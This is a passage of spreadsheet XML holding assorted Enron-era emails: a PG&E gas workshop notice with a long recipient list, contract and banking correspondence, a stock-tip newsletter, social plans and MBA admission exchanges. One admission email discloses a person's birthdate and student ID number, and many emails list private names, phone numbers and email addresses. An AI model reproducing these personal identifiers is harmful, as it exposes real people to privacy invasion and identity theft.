the Enron Corp. Legal Conference, real cool people (like me) are signing up _x000D_
for the raft trip, so as long as the weather's nice we're going to be _x000D_
floating down the Guadalupe drinking some brews.  So if you were cool you'd _x000D_
be hanging out with the cool group (like me)...what are your plans?!!</t>
  </si>
  <si>
    <t>Mon, 9 Oct 2000 06:28:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'andy.bettwy@swgas.com', 'sscott3@enron.com', 'sedgar@socalgas.com', 'gworster@txuenergy.com', 'rczahar@aol.com', 'tpeterso@energy.state.ca.us', 'paulamirault@aec.ca', 'garyb@abag.ca.gov', 'rroth@sempra-slns.com', 'rliebert@cfbf.com', 'rshively@enerdynamics.com', 'frazier@bull.som.yale.edu', 'phanschen@mofo.com', 'eklinkner@ci.pasadena.ca.us', 'lbdr@powercomenergy.com', 'jvaccaro@sdge.com', 'dwillis@sdge.com', 'mcclintocke@epenergy.com', 'napedersen@jonesday.com', 'tsolberg@spurr.org', 'dave.sloan@gt.pge.com', 'jmartini@cipa.org', 'abb@eslawfirm.com', 'porterdk@sce.com', 'roger_tisdale@oxy.com', 'thompson@wrightlaw.com', 'cdoering@reconcorp.com', 'steve_ponder@fpl.com', 'burkee@cts.com', 'salleyoo@dwt.com', 'sslavigne@duke-energy.com', 'michael-briggs@reliantenergy.com', 'gnstillwagon@tid.org', 'prescorw@bp.com', 'mmce@dynegy.com', 'sneiman483@aol.com', 'mtbrommer@tid.org', 'gnadeau@suncor.com', 'wng@fpl.com', 'regaffairs@sf.whitecase.com', 'askaff@energy-law-group.com', 'jkarp@whitecase.com', 'bradb@calpine.com', 'peter.saunders@paramountres.com', 'rbetonte@socalgas.com', 'jlinam@socalgas.com', 'mrokose@energyamerica.com', 'scarter@nrdc.org', 'oro@cpuc.ca.gov', 'cmkehrein@ems-ca.com', 'mcconnk@epenergy.com', 'pmoritzburke@cera.com', 'steve.huhman@southernenergy.com', 'alex.sugaoka@uaecorp.com', 'bcope@ci.redding.ca.us', 'michael_r._soland@oxy.com', 'jbennett@gmssr.com', 'bpedersen@igservice.com', 'mar.toe@att.net', 'jsuwara@sempra.com', 'keith-sappenfield@reliantenergy.com', 'phildavies@aec.ca', 'dlevine@caiso.com', 'jmackay@unitedgas.com', 'nge@value.net', 'bmcc@mccarthylaw.com', 'john_ulrich@city.palo-alto.ca.us', 'slins@ci.glendale.ca.us', 'ceyap@earthlink.net', 'rochmanm@spurr.org', 'jweil@aglet.org', 'alan_reid@pancanadian.ca', 'simonsen@rmi.net', 'bburns@caiso.com', 'hgleason@energyamerica.com', 'mtran@energy.state.ca.us', 'ascott@sdge.com', 'bjeider@ci.burbank.ca.us', 'davef@abag.ca.gov', 'hankd@calpine.com', 'jerryl@abag.ca.gov', 'mike.huk@gov.ab.ca', 'gregs@mid.org', 'cushnice@sce.com', 'gac@mrwassoc.com', 'jaime.ramirez@swgas.com', 'jpjordan@swidlaw.com', 'gwright@sempra.com', 'mmbr@dynegy.com', 'pete.frost@usa.conoco.com', 'gtbl@dynegy.com', 'bgaillar@enron.com', 'ecrem@ix.netcom.com', 'jurewijl@sce.com', 'mjaske@energy.state.ca.us', 'mbornhoeft@socalgas.com', 'pstohr@dbsr.com', 'kfyip@seiworldwide.com', 'spb1@cwclaw.com', 'rhc@mrwassoc.com', 'sbs@cpuc.ca.gov', 'jtachera@energy.state.ca.us', 'paul.macavoy@yale.edu', 'pat_mulhern@oxy.com', 'benledene@aec.ca', 'jamesauld@aec.ca', 'rjl9@pge.com', 'atrowbridge@dbsr.com', 'gjb2@pge.com', 'office@mccarthylaw.com', 'jsteffen@iid.com', 'douglass@arterhadden.com', 'jmct@gmssr.com', 'bmantz@sempra-slns.com', 'kmagruder@newpower.com', 'kbhensman@aeraenergy.com', 'rick.counihan@greenmountain.com', 'rbw@mrwassoc.com', 'richard.jordan@swgas.com', 'tbushman@cellnet.com', 'scohn@smud.org', 'gpickering@idahopower.com', 'khensman@aeraenergy.com', 'mark.c.moench@wgp.twc.com', 'sross@state.nm.us', 'jharrigan@socalgas.com', 'alfredo.huertas@enron.com', 'pinney@capp.ca', 'anikat@greenlining.org', 'jgopal@energy.state.ca.us', 'rochmanm@cubjpa.org', 'jmpa@dynegy.com', 'cyowell@ziagroup.com', 'bcragg@gmssr.com', 'mpa@aelaw.com', 'nmcvay@socalgas.com', 'johnj@bcjlaw.com', 'dalbers@avistacorp.com', 'grant_kolling@city.palo-alto.ca.us', 'jnm@cpuc.ca.gov', 'bfolsom@avistacorp.com', 'zaiontj@bp.com', 'ron_oechsler@rmiinc.com', 'furutanj@efawest.navfac.navy.mil', 'kmccrea@sablaw.com', 'rishikawa@socalgas.com', 'rpelote@energy.twc.com', 'jfossum@westernhubs.com', 'plg@cpuc.ca.gov', 'fergusonm@epenergy.com', 'rmp@cpuc.ca.gov', 'eric.eisenman@neg.pge.com', 'llorenz@pacent.com', 'mdjoseph@adamsbroadwell.com', 'thamilto@enron.com', 'tod_bradley@powerspring.com', 'john.walley@swgas.com', 'chilen@llgm.com', 'bradylaw@pacbell.net', 'joseh@lif.org', 'kpoole@adamsbroadwell.com', 'toca@utility-savings.com', 'lindseyhowdowning@dwt.com', 'bwood@energy.state.ca.us', 'lmh@eslawfirm.com', 'rgloistein@orrick.com', 'jdasovic@enron.com', 'jcattermole@pcenergy.com', 'kirk.t.morgan@wgp.twc.com', 'tomb@crossborderenergy.com', 'ljhubbard@sempra.com', 'tgary@pcenergy.com', 'keith.brown@swgas.com', 'ddame@ncpa.com', 'iep@iepa.com', 'kschellin@mtpower.com', 'lsaffil@flash.net', 'difellman@earthlink.net', 'mday@gmssr.com', 'cottlli@sf.whitecase.com', 'pkeeler@br-inc.com', 'dft1@pge.com', 'edf@cpuc.ca.gov', 'eke@aelaw.com', 'david.bayless@utility.com', 'chris.king@utility.com', 'robertg@greenlining.org', 'rcooper@usg.com', 'cprice@igservice.com', 'ghinners@reliantenergy.com', 'stringham@capp.ca', 'haorndorff@aeraenergy.com', 'stomashe@energy.state.ca.us', 'rdw0@pge.com', 'dwswapp@duke-energy.com', 'raveen_maan@city.palo-alto.ca.us', 'lynn.g.dahlberg@wgp.twc.com', 'rfoss@coral-energy.com', 'karl@ncpa.com', 'marcel@turn.org', 'epoole@adplaw.com', 'jsqueri@gmssr.com', 'tdickers@westerngas.com', 'worthycg@bp.com', 'bdahncke@pcenergy.com', 'rcrowley@coral-energy.com', 'clower@earthlink.net', 'inggm@sce.com', 'fillmotw@sce.com', 'igsinc@ix.netcom.com', 'mpocino@rcgroup.com', 'oshirock@pacbell.net', 'pcervin@br-inc.com', 'chj@aelaw.com', 'michael.alexander@sce.com', 'ewo@jmbm.com', 'rmccann@cal.net', 'bruce.a.connell@usa.conoco.com', 'pjpowerlaw@aol.com', 'jond@qstr.com', 'khatz@titanenergy.com', 'dmkellerton@ibm.net', 'jogg@jhenergy.com', 'tom.roth@et.pge.com', 'karen@klindh.com', 'dpk@cipa.org', 'jyoung@igservice.com', 'ronknecht@aol.com', 'mbaldwin@igservice.com', 'craigc@calpine.com', 'txb6@pge.com', 'ed@clfp.com', 'agoldberg@lgl.twc.com', 'charles.jacobini@acnenergy.com', 'girish_balachandran@city.palo-alto.ca.us', 'rpetti@ladwp.com', 'jleslie@luce.com', 'rpurves@sdge.com', 'frl3@pge.com', 'smcfadden@igservice.com', 'cabaker@duke-energy.com', 'candjenterprises@home.com', 'rtask@reliantenergy.com', 'skatz@sempratrading.com', 'sandra_mcdonough@pcp.ca', 'fogelmanm@steefel.com', 'cgoodman@energymarketers.com', 'gsullivan@sempra.com', 'btheaker@caiso.com', 'jfawcet@enron.com', 'mflorio@turn.org', 'kmills@cfbf.com', 'vhconsult@earthlink.net'})</t>
  </si>
  <si>
    <t>Gas Accord II: Oct. 11-12 Workshop</t>
  </si>
  <si>
    <t xml:space="preserve">  Confidential Settlement Document Under CPUC Rule 51_x000D_
_x000D_
PARTIES:_x000D_
_x000D_
This is a reminder that PG&amp;E is hosting the next workshop regarding "Gas_x000D_
Accord II" issues, at PG&amp;E headquarters, Room 300, 77 Beale Street, San_x000D_
Francisco, this Wednedsay and Thursday, October 11-12.  We plan to start at_x000D_
9:30 a.m. and end around 3:30 p.m., on both days.  PG&amp;E will provide lunch_x000D_
on both days._x000D_
_x000D_
Attached is our proposed agenda for this workshop, which will address market_x000D_
issues and cost-of-service and rate issues related to PG&amp;E's California Gas_x000D_
Transmission system.  In addition, we are pleased to note that_x000D_
representatives of the California Energy Commission will make a presentation_x000D_
regarding their forecast of future electric generation demand._x000D_
_x000D_
We also will use some time at this week's workshop to inform the_x000D_
participants about new issues various parties have identified since the_x000D_
first workshop on September 14._x000D_
_x000D_
PLEASE RSVP IF YOU PLAN TO ATTEND THIS WEEK'S WORKSHOP, so that we can get_x000D_
an accurate head-count for the lunches we will order.  Please RSVP to:_x000D_
Darcy Morrison, e-mail D2Mr@pge.com, or telephone at (415) 973-6644._x000D_
_x000D_
We look forward to this week's workshop, which we think you will find very_x000D_
informative._x000D_
_x000D_
Best regards,_x000D_
_x000D_
Frank Lindh    Ray Williams_x000D_
Attorney    Director_x000D_
415-973-2776   415-973-3634_x000D_
frl3@pge.com   rdw0@pge.com_x000D_
_x000D_
_x000D_
 &lt;&lt;Agenda 10-11&amp;12-00 Workshop.doc&gt;&gt;_x000D_
_x000D_
_x000D_
 - Agenda 10-11&amp;12-00 Workshop.doc</t>
  </si>
  <si>
    <t>Wed, 6 Jun 2001 10:04:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'michelle.maynard@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'tom.prisk@enron.com', 'mark.ziolkowski@enron.com', 'jodi.thrasher@enron.com', 'jeffrey.hodge@enron.com'})</t>
  </si>
  <si>
    <t>NJFC</t>
  </si>
  <si>
    <t xml:space="preserve">Thanks for the update on status.   As Tom and I discussed we've made _x000D_
revisions to the draft anticipating a deal based on the new price structure _x000D_
and wanted to circulate this for internal review.  The blackline below shows _x000D_
the changes to the last draft that we sent to the customer.   If you have any _x000D_
comments, please let us know.  Assume we will revise the draft as necessary _x000D_
after your mtg.  Good luck!   M3_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Michelle Maynard/HOU/EES on 06/06/2001 _x000D_
04:57 PM ---------------------------_x000D_
_x000D_
	Enron Energy Services_x000D_
	_x000D_
	From:  Tom Prisk                           06/06/2001 03:51 PM_x000D_
	Phone No: Office 713-853-5990_x000D_
  Pager 888-526-6207_x000D_
	_x000D_
_x000D_
_x000D_
_x000D_
To: Michelle Maynard/HOU/EES@EES_x000D_
cc:  _x000D_
Subject: NJFC_x000D_
_x000D_
Wanted to update you on the timing and status.  We (Greg, Mark and I) will be _x000D_
meeting with the participants late next week to discuss our deal in person _x000D_
and answer questions.  Looks like we are still talking a wholesale index plus _x000D_
basis deal with a collar._x000D_
_x000D_
They may forward some comments about the contract in general in advance of _x000D_
our meeting.  If so, we will forward to you to discuss prior to the meeting._x000D_
_x000D_
TP_x000D_
</t>
  </si>
  <si>
    <t>Tue, 23 Oct 2001 12:22:04 -0700 (PDT)</t>
  </si>
  <si>
    <t>(ClearStation) Recommendation : ATK (Long) by kensey , Tue Oct 23_x000D_
 2001</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
===================================================_x000D_
Need help gaining an investing edge?_x000D_
Chicago Board Options Exchange recommends options trading._x000D_
Learn how options trading can benefit your portfolio._x000D_
Go now: http://www.cboe.com/options_trading101_x000D_
===================================================_x000D_
_x000D_
Recommend emails are a powerful way to get investment tips as they happen_x000D_
from the ClearStation community. If you would like to UNSUBSCRIBE, go to_x000D_
http://www.clearstation.com/doc/unsub_kensey.html_x000D_
_x000D_
*NOTE : DO NOT reply to this email. Replies should be made within 'Discuss'_x000D_
at the url given below._x000D_
+-+-+-+-+-+-+-+-+-_x000D_
'kensey' has recommended ATK (Long) at Oct 23 2001  7:50AM_x000D_
_x000D_
Alliant Techsystems ( NYSE : ATK )_x000D_
Aerospace / Defense : 0 new highs in group of 33_x000D_
_x000D_
Symbol       Last     Time     Change     High      Low     Volume_x000D_
-----        ----     ----      -----     ----      ---      -----_x000D_
ATK         84.80   5:01PM       0.00    87.49    84.80          0_x000D_
_x000D_
Community Take_x000D_
--------------_x000D_
32 Long / 3 Short_x000D_
_x000D_
'kensey' said:_x000D_
Tue Oct 23 07:48:26 2001_x000D_
_x000D_
stochastic oversold._x000D_
_x000D_
stop below the recent intraday low friday of 82._x000D_
_x000D_
kensey_x000D_
See the annotated graph of this recommendation at:_x000D_
_x000D_
http://www.clearstation.com/cgi-bin/bbs?Cmd=post&amp;post_id=2652640_x000D_
+-+-+-+-+-+-+-+-+-_x000D_
Recommend emails are a powerful way to get investment tips as they happen_x000D_
from the ClearStation community. If you would like to UNSUBSCRIBE, go to_x000D_
http://www.clearstation.com/doc/unsub_kensey.html_x000D_
_x000D_
ClearStation is not an investment advisory service,_x000D_
nor a registered investment advisor or broker-dealer and_x000D_
does not purport to tell or suggest which securities_x000D_
members should buy or sell for themselves. Members should_x000D_
always check with their licensed financial advisor_x000D_
and their tax advisor to determine the suitability of_x000D_
any investment._x000D_
ClearStation, Inc. is a wholly-owned subsidiary of_x000D_
E*TRADE Group, Inc. and an affiliate of E*TRADE_x000D_
Securities, Inc. and E*TRADE Bank. E*TRADE Securities,_x000D_
Inc. and E*TRADE Bank are wholly-owned subsidiaries of_x000D_
E*TRADE Group, Inc. E*TRADE Bank deposits are insured up_x000D_
to $100,000 by the FDIC. E*TRADE Bank and E*TRADE_x000D_
Securities, Inc. are separate but affiliated companies._x000D_
E*TRADE brokerage accounts are maintained by E*TRADE_x000D_
Securities, Inc. Products offered by E*TRADE Securities,_x000D_
Inc. are not insured by the FDIC, are not deposits or_x000D_
obligations of E*TRADE Bank, are subject to investment_x000D_
risk, including possible loss of principal invested._x000D_
ClearStation is a registered trademark of ClearStation, Inc._x000D_
E*TRADE is a registered trademark of E*TRADE Securities,_x000D_
Inc. Member NASD/SIPC._x000D_
Copyright (c) 2000. ClearStation, Inc. All rights reserved._x000D_
</t>
  </si>
  <si>
    <t>Mon, 7 May 2001 04:25:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'alicia.goodrow@enron.com'})</t>
  </si>
  <si>
    <t>Re: Another two guests?</t>
  </si>
  <si>
    <t xml:space="preserve">I would love to pick up you and Henry!_x000D_
_x000D_
_x000D_
_x000D_
	Alicia Goodrow/ENRON@enronXgate_x000D_
	05/07/2001 09:21 AM_x000D_
		 _x000D_
		 To: Tana Jones/HOU/ECT@ECT, kleta_kg@hotmail.com@SMTP@enronXgate_x000D_
		 cc: "Lisa Kennedy (E-mail)" &lt;Lisa_Kennedy@Foleys.com&gt;@SMTP@enronXgate_x000D_
		 Subject: Another two guests?_x000D_
_x000D_
We have had an overwhelmingly favorable response to the May19 Church _x000D_
Gourmet.  I have already added one extra party to accomodate the additional _x000D_
guests.  We now have 48 participants and need a place at the table for 2 or 4 _x000D_
of them.  Is there any way that Tana or Kleta could add a couple of chairs to _x000D_
their tables to squeeze in two more?  Poor Lisa Kennedy has found herself _x000D_
with a potential for 16 guests in her townhouse and is not sure where they _x000D_
will all fit.  _x000D_
_x000D_
If Henry and I could move to Tana's house and Kleta could pick up Dan and _x000D_
Andrea Goodwin, this would solve the problem._x000D_
_x000D_
This is a great problem to have - more than half of the participants in the _x000D_
dinner are new members at CTK - I hope you can help out._x000D_
_x000D_
ALG_x000D_
_x000D_
P.S.  We can loan you extra chairs if necessary.._x000D_
</t>
  </si>
  <si>
    <t>Tue, 1 May 2001 22:52:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'global_agenda@lists.economist.com'})</t>
  </si>
  <si>
    <t>Global Agenda Alert - 2nd May 2001</t>
  </si>
  <si>
    <t xml:space="preserve">[IMAGE]_x000D_
[IMAGE]_x000D_
_x000D_
	[IMAGE] _x000D_
_x000D_
_x000D_
[IMAGE]_x000D_
[IMAGE]_x000D_
[IMAGE]_x000D_
[IMAGE]_x000D_
[IMAGE]_x000D_
ADVANCED SEARCH_x000D_
_x000D_
[IMAGE]_x000D_
_x000D_
[IMAGE]_x000D_
	[IMAGE]_x000D_
	[IMAGE]_x000D_
	_x000D_
	_x000D_
	_x000D_
	Wednesday  May  2nd 2001_x000D_
	_x000D_
	_x000D_
	_x000D_
	Subscribe now! | E-mail &amp; Mobile Editions |  Screensaver_x000D_
	_x000D_
	[IMAGE]_x000D_
	[IMAGE]_x000D_
_x000D_
[IMAGE]_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
OPINION_x000D_
_x000D_
_x000D_
WORLD_x000D_
_x000D_
_x000D_
BUSINESS_x000D_
_x000D_
_x000D_
FINANCE_x000D_
_x000D_
_x000D_
SCIENCE_x000D_
_x000D_
_x000D_
PEOPLE_x000D_
_x000D_
_x000D_
BOOKS &amp; ARTS_x000D_
_x000D_
_x000D_
MARKETS_x000D_
_x000D_
_x000D_
DIVERSIONS_x000D_
_x000D_
_x000D_
[IMAGE]_x000D_
_x000D_
_x000D_
[IMAGE]_x000D_
_x000D_
_x000D_
[IMAGE]_x000D_
[IMAGE]_x000D_
[IMAGE]_x000D_
[IMAGE]_x000D_
[IMAGE]_x000D_
Our new travel section_x000D_
[IMAGE]_x000D_
[IMAGE]_x000D_
[IMAGE]_x000D_
[IMAGE]_x000D_
_x000D_
_x000D_
[IMAGE]_x000D_
[IMAGE]_x000D_
[IMAGE]_x000D_
[IMAGE] [IMAGE] _x000D_
[IMAGE]  NEW ON  ECONOMIST.COM: GLOBAL EXECUTIVE_x000D_
  _x000D_
 Global  Executive is a new career and management section on Economist.com _x000D_
that provides  guidance for executives with an international outlook. With _x000D_
job postings,  personalised career advice, observations on employment trends _x000D_
and reviews  of the latest management books, it's indispensable to the _x000D_
internationally  minded business executive. Visit  Global Executive today._x000D_
_x000D_
    [IMAGE]_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
PRINT EDITION_x000D_
THE ECONOMIST_x000D_
 [IMAGE]Full contents_x000D_
[IMAGE]Subscriptions_x000D_
 _x000D_
_x000D_
_x000D_
[IMAGE]_x000D_
[IMAGE]_x000D_
[IMAGE]_x000D_
[IMAGE] _x000D_
[IMAGE]_x000D_
[IMAGE][IMAGE]	[IMAGE]	[IMAGE]	[IMAGE]	On the Global Agenda _x000D_
				 May  2nd 2001_x000D_
				 _x000D_
				_x000D_
				_x000D_
				_x000D_
				Bush's  call to arms _x000D_
				George  Bush is determined to build a missile shield while cutting America's  _x000D_
nuclear stockpile. That will turn traditional thinking on disarmament  on its _x000D_
head   _x000D_
				Full  article_x000D_
				_x000D_
				_x000D_
				_x000D_
				Murdoch's  big birds _x000D_
				After  years of trying, Rupert Murdoch could be about to plug the gap in  his _x000D_
global satellite-television network. Making money from this ambitious  plan, _x000D_
however, could prove even harder _x000D_
				Full  article _x000D_
				_x000D_
				_x000D_
				_x000D_
				Mayhem  in May _x000D_
				After  recent mass demonstrations in Quebec, anti-globalisation protestors  _x000D_
were out in force again for May Day. The movement may be incoherent,  and _x000D_
often clownish, but it is increasingly influential. And globalisation's  best _x000D_
critics, if not the demonstrators, are raising important issues   _x000D_
				Full  article _x000D_
				_x000D_
				_x000D_
				_x000D_
				Gerhard  Schr"der's EU vision _x000D_
				Germany's  chancellor is putting his weight behind proposals for sweeping _x000D_
new  changes to the European Union. The continent is in for another intense  _x000D_
debate about the EU's constitution, and its future   _x000D_
				Full  article _x000D_
				_x000D_
				_x000D_
				_x000D_
				Nuclear's  comeback _x000D_
				Claiming  that an energy crisis is looming, the United States is about to do  _x000D_
a U-turn on nuclear energy. Fifteen years after Chernobyl, worries  about _x000D_
global warming and improved technology are also combining to  revive interest _x000D_
in the once-vilified nuclear industry in other countries   _x000D_
				Full  article _x000D_
				_x000D_
				_x000D_
				_x000D_
				_x000D_
				_x000D_
				SURVEY:  SOFTWARE_x000D_
				_x000D_
				Find  thought-provoking articles about the future of software in the  _x000D_
Economist's survey. This essential reading provides a history  of open source _x000D_
software, details the growing trend towards software  leased via the _x000D_
Internet, and explains the battle of operating  system platforms. Click  here _x000D_
to read about the future of software._x000D_
				_x000D_
				_x000D_
				SEARCH_x000D_
				The EconomistGlobal LibraryThe webThe EIU Advanced search _x000D_
				_x000D_
				_x000D_
				[IMAGE]_x000D_
				Customer service _x000D_
				_x000D_
				_x000D_
				As a registered  user of Economist.com, you can sign up for or cancel the _x000D_
text and HTML  versions of this newsletter or change your e-mail address by _x000D_
amending  your details. _x000D_
				_x000D_
				To stop receiving  this Global Agenda Alert newsletter, please visit _x000D_
http://economist.com/  members/email.cfm,  log in and complete the form. _x000D_
				_x000D_
				If you received  this newsletter from a friend and you would like to have _x000D_
your own free  subscription, please go to the Economist.com registration  _x000D_
page and fill out the registration form._x000D_
				_x000D_
				     _x000D_
				_x000D_
				? _x000D_
					[IMAGE]	[IMAGE]_x000D_
					[IMAGE]	[IMAGE]_x000D_
				[IMAGE]  	[IMAGE]	[IMAGE]_x000D_
						[IMAGE]_x000D_
						_x000D_
						GO TO ECONOMIST.COM_x000D_
						 , Copyright 2001 The Economist Newspaper and The Economist Group. All rights _x000D_
reserved._x000D_
						Legal disclaimer | Privacy Policy | Terms &amp; Conditions  _x000D_
						[IMAGE]_x000D_
						[IMAGE]_x000D_
						</t>
  </si>
  <si>
    <t>Tue, 2 Jan 2001 05:01:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'pam.becton@enron.com'})</t>
  </si>
  <si>
    <t xml:space="preserve">Rosemary:_x000D_
_x000D_
Here are the addresses you needed for three wires processed in December that _x000D_
you faxed to Dana last week.  These are December payables, so they need to  _x000D_
be entered for December business.   Let me know if you need any more _x000D_
information from me._x000D_
_x000D_
Thanks,_x000D_
Pam_x000D_
3-6595_x000D_
---------------------- Forwarded by Pam Becton/HOU/ECT on 01/02/2001 11:58 AM _x000D_
---------------------------_x000D_
   _x000D_
	Enron North America Corp._x000D_
	_x000D_
	From:  Eric Wardle                           01/02/2001 10:31 AM_x000D_
	_x000D_
_x000D_
To: Pam Becton/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: St. Mary's Bank Info_x000D_
_x000D_
Pam,_x000D_
Here is St. Mary's address:_x000D_
_x000D_
St. Mary's Production, LLC_x000D_
1717 Woodstead Court, Suite 207_x000D_
The Woodlands, Tx 77380_x000D_
_x000D_
Below is the Southwest Bank of Texas information sent by St. Mary's._x000D_
_x000D_
Let me know if you need any additional information._x000D_
_x000D_
---------------------- Forwarded by Eric Wardle/HOU/ECT on 01/02/2001 10:28 _x000D_
AM ---------------------------_x000D_
   _x000D_
	Enron North America Corp._x000D_
	_x000D_
	From:  Eric Wardle                           12/04/2000 06:36 PM_x000D_
	_x000D_
_x000D_
To: Tammy Barta/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Bank Info_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Eric Wardle/HOU/ECT on 12/04/2000 06:35 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
"Preston Exploration, LLC" &lt;preston@prestonexpl.com&gt; on 12/04/2000 06:22:07 PM_x000D_
To: &lt;ewardle@enron.com&gt;_x000D_
cc:  _x000D_
Subject: _x000D_
_x000D_
_x000D_
_x000D_
Eric:_x000D_
?_x000D_
Our bank address is:_x000D_
?_x000D_
Southwest Bank of Texas_x000D_
5 Post Oak Park _x000D_
4400 Post Oak Parkway_x000D_
Houston, Tx.? 77027_x000D_
A. Stephen Kennedy_x000D_
Senior VP - Energy Lending_x000D_
?_x000D_
Jay Hartman_x000D_
?_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 24 Apr 2001 07:14:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'connie.lee@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'julia.hafener@bus.utexas.edu'})</t>
  </si>
  <si>
    <t>RE: Connie Lee Admission Visits</t>
  </si>
  <si>
    <t xml:space="preserve">Julia,_x000D_
_x000D_
I'm looking forward to meeting you on Friday during the information session.  _x000D_
Just to give you an update, I met with a Texas MBA contact, Charlie Weldon _x000D_
(aka Charles V. Weldon), today.  The visit went well and I learned a lot _x000D_
about the MBA program at McCombs.  Charlie was uncertain as to what the "next _x000D_
steps" are in terms of providing feedback to the Admissions Committee. _x000D_
_x000D_
It would be great if you could pass on the necessary evaluation forms, _x000D_
deadlines, etc. that he will need in order to provide feedback to the _x000D_
Admissions Committee.  Charlie's contact information is as follows:_x000D_
_x000D_
(w) 713-345-7229_x000D_
(f) 713-646-2599_x000D_
email:  v.charles.weldon@enron.com_x000D_
_x000D_
Please feel free to contact me should you need any additional information.  _x000D_
Again, thank you for your time and I look forward to visiting with you on _x000D_
Friday._x000D_
_x000D_
Sincerely,_x000D_
_x000D_
Connie Lee_x000D_
Enron Broadband Services_x000D_
713/345-8227 (W)_x000D_
713/419-2728 (C)_x000D_
connie_lee@enron.net_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
	Julia.Hafener@bus.utexas.edu_x000D_
	04/24/01 12:37 PM_x000D_
		 _x000D_
		 To: Connie Lee/Enron Communications@Enron Communications_x000D_
		 cc: _x000D_
		 Subject: RE: Connie Lee Admission Visits_x000D_
_x000D_
_x000D_
_x000D_
Dear Connie,_x000D_
_x000D_
I will be conducting the information session on Friday, so I will be_x000D_
around to answer any questions that you may have.  Do you have Charles_x000D_
e-mail address?  I will be happy to pass on the information that he_x000D_
needs to him._x000D_
_x000D_
We look forward to your visit!_x000D_
_x000D_
Julia_x000D_
_x000D_
-----Original Message-----_x000D_
From: Connie_Lee@enron.net [mailto:Connie_Lee@enron.net]_x000D_
Sent: Monday, April 23, 2001 2:14 PM_x000D_
To: Julia Hafener_x000D_
Subject: RE: Connie Lee Admission Visits_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Julia,_x000D_
_x000D_
Thank you for the quick response.  I tried this morning and the_x000D_
information was_x000D_
not in the system yet.  However, when I tried this afternoon, I was able_x000D_
to find_x000D_
a contact.  I am going to be talking to Charles Weldon (MBA 2000) at one_x000D_
point_x000D_
this week.  This is the first interview Charles will be performing and_x000D_
he was_x000D_
curious as to what he needed to provide to the Admissions office.  Do I_x000D_
need to_x000D_
bring him an evaluation form, etc.?_x000D_
_x000D_
Also, I plan to come down for the campus tour and information session on_x000D_
Friday_x000D_
of this week, April 27, 2001.  I believe that it begins at 1:00 pm.  I_x000D_
would_x000D_
love to stop by and visit with you if you have time._x000D_
_x000D_
Thank you and I look forward to hearing from you soon._x000D_
_x000D_
Connie Lee_x000D_
Enron Broadband Services_x000D_
713/345-8227 (W)_x000D_
713/419-2728 (C)_x000D_
connie_lee@enron.net_x000D_
_x000D_
_x000D_
_x000D_
|--------+-----------------------&gt;_x000D_
|        |          TexasMBA@bus.|_x000D_
|        |          utexas.edu   |_x000D_
|        |                       |_x000D_
|        |          04/23/01     |_x000D_
|        |          12:10 PM     |_x000D_
|        |                       |_x000D_
|--------+-----------------------&gt;_x000D_
_x000D_
&gt;-----------------------------------------------------------------------_x000D_
-----|_x000D_
  |_x000D_
|_x000D_
  |       To:     Connie Lee/Enron Communications@Enron Communications_x000D_
|_x000D_
  |       cc:_x000D_
|_x000D_
  |       Subject:     RE: Connie Lee Admission Visits_x000D_
|_x000D_
_x000D_
&gt;-----------------------------------------------------------------------_x000D_
-----|_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Dear Connie,_x000D_
_x000D_
I just tried logging on as you and I was able to do it.  Why don't you_x000D_
try again and let me know if you have any problems._x000D_
_x000D_
Julia_x000D_
_x000D_
Julia Hafener and Sean P. Maloney_x000D_
Texas Admissions Committee, Directors_x000D_
McCombs Graduate School of Business_x000D_
University of Texas at Austin_x000D_
(800) 658-9227_x000D_
TexasMBA@bus.utexas.edu_x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
From: Connie_Lee@enron.net [mailto:Connie_Lee@enron.net]_x000D_
Sent: Monday, April 23, 2001 8:57 AM_x000D_
To: AdmissionVisits_x000D_
Subject: Connie Lee Admission Visits_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Re:  Application for Connie Nita Lee to the MBA Program at the McCombs_x000D_
School of_x000D_
Business_x000D_
_x000D_
To Whom It May Concern:_x000D_
_x000D_
I submitted an application through Embark for the MBA Program at the_x000D_
McCombs_x000D_
School of Business on Saturday, April 14, 2001.  I have been looking_x000D_
forward to_x000D_
scheduling an off-campus interview with a UT Alumnus.  However, I am_x000D_
having_x000D_
difficulty signing up for an interview on-line.  I have been entering_x000D_
the_x000D_
following information:_x000D_
_x000D_
birthdate:  19710705_x000D_
student ID:  334621557_x000D_
_x000D_
Since the deadline for off-campus interviews is May 1, 2001, you can_x000D_
probably_x000D_
understand my concern for getting an interview scheduled.  The people in_x000D_
the_x000D_
admissions office were kind enough to check on the status of my_x000D_
application,_x000D_
however, it appears that my application has still not down-loaded into_x000D_
the UT_x000D_
system.  Can you please inform me of an alternate way to schedule an_x000D_
off-campus_x000D_
interview so that I may talk to someone prior to the May 1, 2001_x000D_
deadline?_x000D_
_x000D_
Thank you so much for your consideration in the above matter.  I look_x000D_
forward to_x000D_
hearing from you soon._x000D_
_x000D_
Sincerely,_x000D_
_x000D_
Connie Lee_x000D_
Enron Broadband Services_x000D_
713/345-8227 (W)_x000D_
713/419-2728 (C)_x000D_
connie_lee@enron.net_x000D_
_x000D_
_x000D_
 - att1.htm_x000D_
</t>
  </si>
  <si>
    <t>Fri, 12 Oct 2001 14:38:22 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'tyrell.harrison@enron.com', 'barry.tycholiz@enron.com'})</t>
  </si>
  <si>
